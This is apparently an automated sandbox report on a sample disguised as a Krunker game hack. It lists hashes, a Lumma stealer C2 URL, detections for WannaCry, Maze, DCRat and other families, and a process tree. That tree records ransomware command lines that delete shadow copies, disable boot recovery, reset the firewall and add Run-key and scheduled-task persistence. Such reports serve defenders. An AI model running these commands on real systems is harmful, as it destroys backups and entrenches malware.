Resubmissions

02-09-2024 06:59

240902-hsk4hawbnd 10

02-09-2024 06:58

240902-hrpqaswbmb 10

02-09-2024 02:33

240902-c16ghszgkh 10

16-04-2024 14:39

240416-r1ca1ace39 10

Analysis

  • max time kernel
    581s
  • max time network
    589s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231222-en
  • resource tags

    arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-01-2024 22:08

General

  • Target

    krunker.iohacks.exe

  • Size

    30.9MB

  • MD5

    2850f1cb75953d9e0232344f6a13bf48

  • SHA1

    141ab8929fbe01031ab1e559d880440ae931cc16

  • SHA256

    892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

  • SHA512

    25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d

  • SSDEEP

    786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Malware Config

Extracted

Family

lumma

C2

http://soupinterestoe.fun/api

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Neshta payload 9 IoCs
  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Maze

    Ransomware family also known as ChaCha.

  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Ramnit

    Ramnit is a versatile family that holds viruses, worms, and Trojans.

  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • UAC bypass 3 TTPs 6 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • DCRat payload 1 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 27 IoCs
  • Modifies Windows Firewall 1 TTPs 3 IoCs
  • Drops startup file 18 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 64 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 10 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
    "C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2596
  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    1⤵
    • Drops startup file
    • Executes dropped EXE
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:764
    • C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall reset
      2⤵
      • Modifies Windows Firewall
      • Drops startup file
      • Executes dropped EXE
      • Sets desktop wallpaper using registry
      • Suspicious behavior: EnumeratesProcesses
      PID:4528
      • C:\Windows\system32\wbem\wmic.exe
        "C:\l\..\Windows\dslx\dyx\..\..\system32\el\ggpy\..\..\wbem\mwkh\dtstq\..\..\wmic.exe" shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:7084
    • C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      2⤵
      • Modifies Windows Firewall
      PID:400
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VV5V_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
        PID:6096
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___Q1EGTJTM_.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:3864
      • C:\Windows\svchost.com
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
        2⤵
        • Executes dropped EXE
        PID:5136
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
          3⤵
            PID:6264
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im E
              4⤵
              • Kills process with taskkill
              PID:7036
            • C:\Windows\SysWOW64\PING.EXE
              ping -n 1 127.0.0.1
              4⤵
              • Runs ping.exe
              PID:996
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:6156
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
        "x2s443bc.cs1.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1788
        • C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp" /SL5="$30210,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
          2⤵
          • Executes dropped EXE
          PID:4368
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61B7.tmp\61B8.tmp\61B9.bat C:\Users\Admin\Desktop\1.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
          2⤵
          • Executes dropped EXE
          • Modifies registry class
          PID:4068
          • C:\Windows\svchost.com
            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://iplogger.org/2bB2s6
            3⤵
            • Executes dropped EXE
            PID:1952
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
        taskdl.exe
        1⤵
          PID:4488
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c 184691704838826.bat
          1⤵
            PID:2160
            • C:\Windows\SysWOW64\cscript.exe
              cscript.exe //nologo m.vbs
              2⤵
                PID:2176
            • C:\Windows\SysWOW64\attrib.exe
              attrib +h +s F:\$RECYCLE
              1⤵
              • Views/modifies file attributes
              PID:3832
            • C:\Users\Admin\Desktop\10.exe
              "C:\Users\Admin\Desktop\10.exe"
              1⤵
              • Executes dropped EXE
              PID:1648
              • C:\Windows\SysWOW64\icacls.exe
                icacls . /grant Everyone:F /T /C /Q
                2⤵
                • Modifies file permissions
                PID:2228
              • C:\Windows\SysWOW64\attrib.exe
                attrib +h .
                2⤵
                • Views/modifies file attributes
                PID:2004
            • C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              1⤵
              • Executes dropped EXE
              PID:4488
            • C:\Windows\svchost.com
              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
              1⤵
              • Executes dropped EXE
              PID:2304
              • C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
                C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
                2⤵
                • Executes dropped EXE
                • Modifies registry class
                PID:1064
            • C:\Windows\svchost.com
              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
              1⤵
              • Executes dropped EXE
              PID:2456
              • C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
                C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
                2⤵
                • Executes dropped EXE
                • Modifies registry class
                PID:4476
                • C:\Windows\svchost.com
                  "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs
                  3⤵
                  • Executes dropped EXE
                  PID:5504
                  • C:\Windows\SysWOW64\wscript.exe
                    C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs
                    4⤵
                      PID:5056
              • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
                1⤵
                  PID:1964
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5040 -ip 5040
                  1⤵
                    PID:3316
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1304 -ip 1304
                    1⤵
                      PID:484
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 320
                      1⤵
                      • Program crash
                      PID:3284
                    • C:\Users\Admin\Desktop\6.exe
                      "C:\Users\Admin\Desktop\6.exe"
                      1⤵
                      • UAC bypass
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Checks whether UAC is enabled
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • System policy modification
                      PID:1456
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\l41MpFgpBE.bat"
                        2⤵
                          PID:6196
                          • C:\Windows\system32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            3⤵
                              PID:864
                            • C:\Program Files\Java\jdk-1.8\include\bot.exe
                              "C:\Program Files\Java\jdk-1.8\include\bot.exe"
                              3⤵
                              • UAC bypass
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • System policy modification
                              PID:5280
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 324
                          1⤵
                          • Program crash
                          PID:3832
                        • C:\Users\Admin\Desktop\8.exe
                          "C:\Users\Admin\Desktop\8.exe"
                          1⤵
                            PID:4528
                          • C:\Users\Admin\Desktop\7.exe
                            "C:\Users\Admin\Desktop\7.exe"
                            1⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1492
                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                              2⤵
                              • Accesses Microsoft Outlook accounts
                              PID:6464
                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5872
                          • C:\Users\Admin\Desktop\5.exe
                            "C:\Users\Admin\Desktop\5.exe"
                            1⤵
                            • Executes dropped EXE
                            • Modifies registry class
                            PID:1496
                            • C:\Windows\svchost.com
                              "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:6216
                              • C:\PROGRA~3\system.exe
                                C:\PROGRA~3\system.exe
                                3⤵
                                • Drops startup file
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:6592
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
                                  4⤵
                                  • Modifies Windows Firewall
                                  PID:5172
                          • C:\Windows\svchost.com
                            "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs
                            1⤵
                            • Executes dropped EXE
                            PID:4304
                            • C:\Windows\SysWOW64\wscript.exe
                              C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs
                              2⤵
                              • Drops file in Drivers directory
                              • Drops startup file
                              • Drops file in System32 directory
                              • Drops file in Program Files directory
                              • Drops file in Windows directory
                              PID:2324
                          • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                            "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
                            1⤵
                              PID:2888
                            • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                              "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
                              1⤵
                                PID:1480
                              • C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
                                C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://iplogger.org/2bB2s6
                                1⤵
                                • Executes dropped EXE
                                PID:1008
                              • C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
                                C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
                                1⤵
                                • Executes dropped EXE
                                PID:5040
                              • C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
                                C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
                                1⤵
                                • Executes dropped EXE
                                PID:1304
                              • C:\Windows\svchost.com
                                "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:4492
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe
                                  C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6208
                              • C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp" /SL5="$4022C,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:2292
                              • C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
                                "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
                                1⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Drops autorun.inf file
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4792
                              • C:\Windows\system32\vssvc.exe
                                C:\Windows\system32\vssvc.exe
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4628
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\include\bot.exe'" /rl HIGHEST /f
                                1⤵
                                • Process spawned unexpected child process
                                • Creates scheduled task(s)
                                PID:4696
                              • C:\Users\Admin\Desktop\1.exe
                                "C:\Users\Admin\Desktop\1.exe"
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1332
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls . /grant Everyone:F /T /C /Q
                                1⤵
                                • Modifies file permissions
                                PID:736
                              • C:\Windows\SysWOW64\attrib.exe
                                attrib +h .
                                1⤵
                                • Views/modifies file attributes
                                PID:3316
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
                                "ska2pwej.aeh.exe"
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4024
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
                                "RIP_YOUR_PC_LOL.exe"
                                1⤵
                                • Executes dropped EXE
                                • Modifies registry class
                                • Suspicious use of WriteProcessMemory
                                PID:1916
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
                                1⤵
                                • Drops startup file
                                • Executes dropped EXE
                                • Sets desktop wallpaper using registry
                                • Suspicious use of WriteProcessMemory
                                PID:1676
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                  taskdl.exe
                                  2⤵
                                  • Executes dropped EXE
                                  PID:7140
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c start /b @[email protected] vs
                                  2⤵
                                    PID:6192
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:6100
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                        4⤵
                                          PID:4296
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
                                      2⤵
                                        PID:5832
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
                                          3⤵
                                          • Adds Run key to start application
                                          • Modifies registry key
                                          PID:6480
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • Sets desktop wallpaper using registry
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5804
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        PID:660
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        PID:484
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        PID:5360
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1836
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4192
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1832
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4488
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        PID:2380
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        PID:284
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        PID:6876
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4392
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        PID:5864
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        PID:6360
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        PID:5592
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                        2⤵
                                          PID:4060
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                          taskdl.exe
                                          2⤵
                                            PID:7088
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                            2⤵
                                              PID:5328
                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                              taskdl.exe
                                              2⤵
                                                PID:5680
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                2⤵
                                                  PID:7156
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                  taskdl.exe
                                                  2⤵
                                                    PID:6896
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                    2⤵
                                                      PID:3508
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                      taskdl.exe
                                                      2⤵
                                                        PID:6508
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                        2⤵
                                                          PID:4272
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                          taskdl.exe
                                                          2⤵
                                                            PID:2468
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                            2⤵
                                                              PID:5244
                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                              taskdl.exe
                                                              2⤵
                                                                PID:6160
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                2⤵
                                                                  PID:5436
                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                  taskdl.exe
                                                                  2⤵
                                                                    PID:1952
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                    2⤵
                                                                      PID:5052
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                      taskdl.exe
                                                                      2⤵
                                                                        PID:6600
                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                        2⤵
                                                                          PID:3316
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                          taskdl.exe
                                                                          2⤵
                                                                            PID:1912
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                            2⤵
                                                                              PID:456
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                              taskdl.exe
                                                                              2⤵
                                                                                PID:4604
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                2⤵
                                                                                  PID:2788
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                  taskdl.exe
                                                                                  2⤵
                                                                                    PID:4224
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:2564
                                                                                • C:\Windows\svchost.com
                                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6752
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5780
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp" /SL5="$4031E,4513031,54272,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:2696
                                                                                      • C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe
                                                                                        "C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -i
                                                                                        4⤵
                                                                                          PID:6036
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          "C:\Windows\system32\net.exe" helpmsg 193
                                                                                          4⤵
                                                                                            PID:5328
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 helpmsg 193
                                                                                              5⤵
                                                                                                PID:7124
                                                                                            • C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe
                                                                                              "C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -s
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5820
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\setup\System.exe'" /rl HIGHEST /f
                                                                                        1⤵
                                                                                        • Process spawned unexpected child process
                                                                                        • Creates scheduled task(s)
                                                                                        PID:6896
